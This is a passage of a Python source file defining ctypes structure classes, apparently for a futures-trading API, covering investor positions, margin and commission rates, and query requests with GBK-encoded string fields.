("PositionProfit", c_double),
("PreSettlementPrice", c_double),
("SettlementPrice", c_double),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("OpenCost", c_double),
("ExchangeMargin", c_double),
("CombPosition", c_int),
("CombLongFrozen", c_int),
("CombShortFrozen", c_int),
("CloseProfitByDate", c_double),
("CloseProfitByTrade", c_double),
("TodayPosition", c_int),
("MarginRateByMoney", c_double),
("MarginRateByVolume", c_double),
("StrikeFrozen", c_int),
("StrikeFrozenAmount", c_double),
("AbandonFrozen", c_int),
("ExchangeID", c_char_Array_9),
("YdStrikeFrozen", c_int),
("InvestUnitID", c_char_Array_17),
("PositionCostOffset", c_double),
]
def __init__(self, InstrumentID=None, BrokerID=None, InvestorID=None, PosiDirection=None, HedgeFlag=None, PositionDate=None, YdPosition=None, Position=None, LongFrozen=None, ShortFrozen=None, LongFrozenAmount=None, ShortFrozenAmount=None, OpenVolume=None, CloseVolume=None, OpenAmount=None, CloseAmount=None, PositionCost=None, PreMargin=None, UseMargin=None, FrozenMargin=None, FrozenCash=None, FrozenCommission=None, CashIn=None, Commission=None, CloseProfit=None, PositionProfit=None, PreSettlementPrice=None, SettlementPrice=None, TradingDay=None, SettlementID=None, OpenCost=None, ExchangeMargin=None, CombPosition=None, CombLongFrozen=None, CombShortFrozen=None, CloseProfitByDate=None, CloseProfitByTrade=None, TodayPosition=None, MarginRateByMoney=None, MarginRateByVolume=None, StrikeFrozen=None, StrikeFrozenAmount=None, AbandonFrozen=None, ExchangeID=None, YdStrikeFrozen=None, InvestUnitID=None, PositionCostOffset=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if PosiDirection:
self.PosiDirection = PosiDirection.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if PositionDate:
self.PositionDate = PositionDate.encode("GBK")
if YdPosition:
self.YdPosition = YdPosition
if Position:
self.Position = Position
if LongFrozen:
self.LongFrozen = LongFrozen
if ShortFrozen:
self.ShortFrozen = ShortFrozen
if LongFrozenAmount:
self.LongFrozenAmount = LongFrozenAmount
if ShortFrozenAmount:
self.ShortFrozenAmount = ShortFrozenAmount
if OpenVolume:
self.OpenVolume = OpenVolume
if CloseVolume:
self.CloseVolume = CloseVolume
if OpenAmount:
self.OpenAmount = OpenAmount
if CloseAmount:
self.CloseAmount = CloseAmount
if PositionCost:
self.PositionCost = PositionCost
if PreMargin:
self.PreMargin = PreMargin
if UseMargin:
self.UseMargin = UseMargin
if FrozenMargin:
self.FrozenMargin = FrozenMargin
if FrozenCash:
self.FrozenCash = FrozenCash
if FrozenCommission:
self.FrozenCommission = FrozenCommission
if CashIn:
self.CashIn = CashIn
if Commission:
self.Commission = Commission
if CloseProfit:
self.CloseProfit = CloseProfit
if PositionProfit:
self.PositionProfit = PositionProfit
if PreSettlementPrice:
self.PreSettlementPrice = PreSettlementPrice
if SettlementPrice:
self.SettlementPrice = SettlementPrice
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if OpenCost:
self.OpenCost = OpenCost
if ExchangeMargin:
self.ExchangeMargin = ExchangeMargin
if CombPosition:
self.CombPosition = CombPosition
if CombLongFrozen:
self.CombLongFrozen = CombLongFrozen
if CombShortFrozen:
self.CombShortFrozen = CombShortFrozen
if CloseProfitByDate:
self.CloseProfitByDate = CloseProfitByDate
if CloseProfitByTrade:
self.CloseProfitByTrade = CloseProfitByTrade
if TodayPosition:
self.TodayPosition = TodayPosition
if MarginRateByMoney:
self.MarginRateByMoney = MarginRateByMoney
if MarginRateByVolume:
self.MarginRateByVolume = MarginRateByVolume
if StrikeFrozen:
self.StrikeFrozen = StrikeFrozen
if StrikeFrozenAmount:
self.StrikeFrozenAmount = StrikeFrozenAmount
if AbandonFrozen:
self.AbandonFrozen = AbandonFrozen
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if YdStrikeFrozen:
self.YdStrikeFrozen = YdStrikeFrozen
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if PositionCostOffset:
self.PositionCostOffset = PositionCostOffset
class SyncingInstrumentMarginRate(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("HedgeFlag", c_char),
("LongMarginRatioByMoney", c_double),
("LongMarginRatioByVolume", c_double),
("ShortMarginRatioByMoney", c_double),
("ShortMarginRatioByVolume", c_double),
("IsRelative", c_int),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, HedgeFlag=None, LongMarginRatioByMoney=None, LongMarginRatioByVolume=None, ShortMarginRatioByMoney=None, ShortMarginRatioByVolume=None, IsRelative=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if LongMarginRatioByMoney:
self.LongMarginRatioByMoney = LongMarginRatioByMoney
if LongMarginRatioByVolume:
self.LongMarginRatioByVolume = LongMarginRatioByVolume
if ShortMarginRatioByMoney:
self.ShortMarginRatioByMoney = ShortMarginRatioByMoney
if ShortMarginRatioByVolume:
self.ShortMarginRatioByVolume = ShortMarginRatioByVolume
if IsRelative:
self.IsRelative = IsRelative
class SyncingInstrumentCommissionRate(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("OpenRatioByMoney", c_double),
("OpenRatioByVolume", c_double),
("CloseRatioByMoney", c_double),
("CloseRatioByVolume", c_double),
("CloseTodayRatioByMoney", c_double),
("CloseTodayRatioByVolume", c_double),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, OpenRatioByMoney=None, OpenRatioByVolume=None, CloseRatioByMoney=None, CloseRatioByVolume=None, CloseTodayRatioByMoney=None, CloseTodayRatioByVolume=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if OpenRatioByMoney:
self.OpenRatioByMoney = OpenRatioByMoney
if OpenRatioByVolume:
self.OpenRatioByVolume = OpenRatioByVolume
if CloseRatioByMoney:
self.CloseRatioByMoney = CloseRatioByMoney
if CloseRatioByVolume:
self.CloseRatioByVolume = CloseRatioByVolume
if CloseTodayRatioByMoney:
self.CloseTodayRatioByMoney = CloseTodayRatioByMoney
if CloseTodayRatioByVolume:
self.CloseTodayRatioByVolume = CloseTodayRatioByVolume
class SyncingInstrumentTradingRight(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("TradingRight", c_char),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, TradingRight=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if TradingRight:
self.TradingRight = TradingRight.encode("GBK")
class QryOrder(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("OrderSysID", c_char_Array_21),
("InsertTimeStart", c_char_Array_9),
("InsertTimeEnd", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, OrderSysID=None, InsertTimeStart=None, InsertTimeEnd=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if OrderSysID:
self.OrderSysID = OrderSysID.encode("GBK")
if InsertTimeStart:
self.InsertTimeStart = InsertTimeStart.encode("GBK")
if InsertTimeEnd:
self.InsertTimeEnd = InsertTimeEnd.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QryTrade(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("TradeID", c_char_Array_21),
("TradeTimeStart", c_char_Array_9),
("TradeTimeEnd", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, TradeID=None, TradeTimeStart=None, TradeTimeEnd=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if TradeID:
self.TradeID = TradeID.encode("GBK")
if TradeTimeStart:
self.TradeTimeStart = TradeTimeStart.encode("GBK")
if TradeTimeEnd:
self.TradeTimeEnd = TradeTimeEnd.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QryInvestorPosition(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QryTradingAccount(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
("BizType", c_char),
("AccountID", c_char_Array_13),
]
def __init__(self, BrokerID=None, InvestorID=None, CurrencyID=None, BizType=None, AccountID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if BizType:
self.BizType = BizType.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
class QryInvestor(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
]
def __init__(self, BrokerID=None, InvestorID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
class QryTradingCode(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
("ClientID", c_char_Array_11),
("ClientIDType", c_char),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, ExchangeID=None, ClientID=None, ClientIDType=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ClientIDType:
self.ClientIDType = ClientIDType.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QryInvestorGroup(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
]
def __init__(self, BrokerID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
class QryInstrumentMarginRate(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("HedgeFlag", c_char),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, HedgeFlag=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QryInstrumentCommissionRate(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class QryInstrumentTradingRight(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
class QryBroker(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
]
def __init__(self, BrokerID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
class QryTrader(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("TraderID", c_char_Array_21),
]
def __init__(self, ExchangeID=None, ParticipantID=None, TraderID=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
class QrySuperUserFunction(Struct):
_fields_ = [
("UserID", c_char_Array_16),
]
def __init__(self, UserID=None):
super().__init__()
if UserID:
self.UserID = UserID.encode("GBK")
class QryUserSession(Struct):
_fields_ = [
("FrontID", c_int),
("SessionID", c_int),
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
]
def __init__(self, FrontID=None, SessionID=None, BrokerID=None, UserID=None):
super().__init__()
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
class QryPartBroker(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("BrokerID", c_char_Array_11),
("ParticipantID", c_char_Array_11),
]
def __init__(self, ExchangeID=None, BrokerID=None, ParticipantID=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
class QryFrontStatus(Struct):
_fields_ = [
("FrontID", c_int),
]
def __init__(self, FrontID=None):
super().__init__()
if FrontID:
self.FrontID = FrontID
class QryExchangeOrder(Struct):
_fields_ = [
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("TraderID", c_char_Array_21),
]
def __init__(self, ParticipantID=None, ClientID=None, ExchangeInstID=None, ExchangeID=None, TraderID=None):
super().__init__()
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
class QryOrderAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
]
def __init__(self, BrokerID=None, InvestorID=None, ExchangeID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class QryExchangeOrderAction(Struct):
_fields_ = [
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeID", c_char_Array_9),
("TraderID", c_char_Array_21),
]
def __init__(self, ParticipantID=None, ClientID=None, ExchangeID=None, TraderID=None):
super().__init__()
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
class QrySuperUser(Struct):
_fields_ = [
("UserID", c_char_Array_16),
]
def __init__(self, UserID=None):
super().__init__()
if UserID:
self.UserID = UserID.encode("GBK")
class QryExchange(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
]
def __init__(self, ExchangeID=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class QryProduct(Struct):
_fields_ = [
("ProductID", c_char_Array_31),
("ProductClass", c_char),
("ExchangeID", c_char_Array_9),
]
def __init__(self, ProductID=None, ProductClass=None, ExchangeID=None):
super().__init__()
if ProductID:
self.ProductID = ProductID.encode("GBK")
if ProductClass:
self.ProductClass = ProductClass.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class QryInstrument(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("ExchangeInstID", c_char_Array_31),
("ProductID", c_char_Array_31),
]
def __init__(self, InstrumentID=None, ExchangeID=None, ExchangeInstID=None, ProductID=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if ProductID:
self.ProductID = ProductID.encode("GBK")
class QryDepthMarketData(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
]
def __init__(self, InstrumentID=None, ExchangeID=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class QryBrokerUser(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
]
def __init__(self, BrokerID=None, UserID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
class QryBrokerUserFunction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
]
def __init__(self, BrokerID=None, UserID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
class QryTraderOffer(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("TraderID", c_char_Array_21),
]
def __init__(self, ExchangeID=None, ParticipantID=None, TraderID=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
class QrySyncDeposit(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("DepositSeqNo", c_char_Array_15),
]
def __init__(self, BrokerID=None, DepositSeqNo=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if DepositSeqNo:
self.DepositSeqNo = DepositSeqNo.encode("GBK")
class QrySettlementInfo(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("TradingDay", c_char_Array_9),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
]
def __init__(self, BrokerID=None, InvestorID=None, TradingDay=None, AccountID=None, CurrencyID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
class QryExchangeMarginRate(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InstrumentID", c_char_Array_31),
("HedgeFlag", c_char),
("ExchangeID", c_char_Array_9),
]
def __init__(self, BrokerID=None, InstrumentID=None, HedgeFlag=None, ExchangeID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class QryExchangeMarginRateAdjust(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InstrumentID", c_char_Array_31),
("HedgeFlag", c_char),
]
def __init__(self, BrokerID=None, InstrumentID=None, HedgeFlag=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
class QryExchangeRate(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("FromCurrencyID", c_char_Array_4),
("ToCurrencyID", c_char_Array_4),
]
def __init__(self, BrokerID=None, FromCurrencyID=None, ToCurrencyID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if FromCurrencyID:
self.FromCurrencyID = FromCurrencyID.encode("GBK")
if ToCurrencyID:
self.ToCurrencyID = ToCurrencyID.encode("GBK")
class QrySyncFundMortgage(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("MortgageSeqNo", c_char_Array_15),
]
def __init__(self, BrokerID=None, MortgageSeqNo=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if MortgageSeqNo:
self.MortgageSeqNo = MortgageSeqNo.encode("GBK")
class QryHisOrder(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("OrderSysID", c_char_Array_21),
("InsertTimeStart", c_char_Array_9),
("InsertTimeEnd", c_char_Array_9),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, OrderSysID=None, InsertTimeStart=None, InsertTimeEnd=None, TradingDay=None, SettlementID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if OrderSysID:
self.OrderSysID = OrderSysID.encode("GBK")
if InsertTimeStart:
self.InsertTimeStart = InsertTimeStart.encode("GBK")
if InsertTimeEnd:
self.InsertTimeEnd = InsertTimeEnd.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
class OptionInstrMiniMargin(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("MinMargin", c_double),
("ValueMethod", c_char),
("IsRelative", c_int),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, MinMargin=None, ValueMethod=None, IsRelative=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if MinMargin:
self.MinMargin = MinMargin
if ValueMethod:
self.ValueMethod = ValueMethod.encode("GBK")
if IsRelative:
self.IsRelative = IsRelative
class OptionInstrMarginAdjust(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("SShortMarginRatioByMoney", c_double),
("SShortMarginRatioByVolume", c_double),
("HShortMarginRatioByMoney", c_double),
("HShortMarginRatioByVolume", c_double),
("AShortMarginRatioByMoney", c_double),
("AShortMarginRatioByVolume", c_double),
("IsRelative", c_int),
("MShortMarginRatioByMoney", c_double),
("MShortMarginRatioByVolume", c_double),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, SShortMarginRatioByMoney=None, SShortMarginRatioByVolume=None, HShortMarginRatioByMoney=None, HShortMarginRatioByVolume=None, AShortMarginRatioByMoney=None, AShortMarginRatioByVolume=None, IsRelative=None, MShortMarginRatioByMoney=None, MShortMarginRatioByVolume=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if SShortMarginRatioByMoney:
self.SShortMarginRatioByMoney = SShortMarginRatioByMoney
if SShortMarginRatioByVolume:
self.SShortMarginRatioByVolume = SShortMarginRatioByVolume
if HShortMarginRatioByMoney:
self.HShortMarginRatioByMoney = HShortMarginRatioByMoney
if HShortMarginRatioByVolume:
self.HShortMarginRatioByVolume = HShortMarginRatioByVolume
if AShortMarginRatioByMoney:
self.AShortMarginRatioByMoney = AShortMarginRatioByMoney
if AShortMarginRatioByVolume:
self.AShortMarginRatioByVolume = AShortMarginRatioByVolume
if IsRelative:
self.IsRelative = IsRelative
if MShortMarginRatioByMoney:
self.MShortMarginRatioByMoney = MShortMarginRatioByMoney
if MShortMarginRatioByVolume:
self.MShortMarginRatioByVolume = MShortMarginRatioByVolume
class OptionInstrCommRate(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("OpenRatioByMoney", c_double),
("OpenRatioByVolume", c_double),
("CloseRatioByMoney", c_double),
("CloseRatioByVolume", c_double),
("CloseTodayRatioByMoney", c_double),
("CloseTodayRatioByVolume", c_double),
("StrikeRatioByMoney", c_double),
("StrikeRatioByVolume", c_double),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, OpenRatioByMoney=None, OpenRatioByVolume=None, CloseRatioByMoney=None, CloseRatioByVolume=None, CloseTodayRatioByMoney=None, CloseTodayRatioByVolume=None, StrikeRatioByMoney=None, StrikeRatioByVolume=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if OpenRatioByMoney:
self.OpenRatioByMoney = OpenRatioByMoney
if OpenRatioByVolume:
self.OpenRatioByVolume = OpenRatioByVolume
if CloseRatioByMoney:
self.CloseRatioByMoney = CloseRatioByMoney
if CloseRatioByVolume:
self.CloseRatioByVolume = CloseRatioByVolume
if CloseTodayRatioByMoney:
self.CloseTodayRatioByMoney = CloseTodayRatioByMoney
if CloseTodayRatioByVolume:
self.CloseTodayRatioByVolume = CloseTodayRatioByVolume
if StrikeRatioByMoney:
self.StrikeRatioByMoney = StrikeRatioByMoney
if StrikeRatioByVolume:
self.StrikeRatioByVolume = StrikeRatioByVolume
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class OptionInstrTradeCost(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("HedgeFlag", c_char),
("FixedMargin", c_double),
("MiniMargin", c_double),
("Royalty", c_double),
("ExchFixedMargin", c_double),
("ExchMiniMargin", c_double),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, HedgeFlag=None, FixedMargin=None, MiniMargin=None, Royalty=None, ExchFixedMargin=None, ExchMiniMargin=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if FixedMargin:
self.FixedMargin = FixedMargin
if MiniMargin:
self.MiniMargin = MiniMargin
if Royalty:
self.Royalty = Royalty
if ExchFixedMargin:
self.ExchFixedMargin = ExchFixedMargin
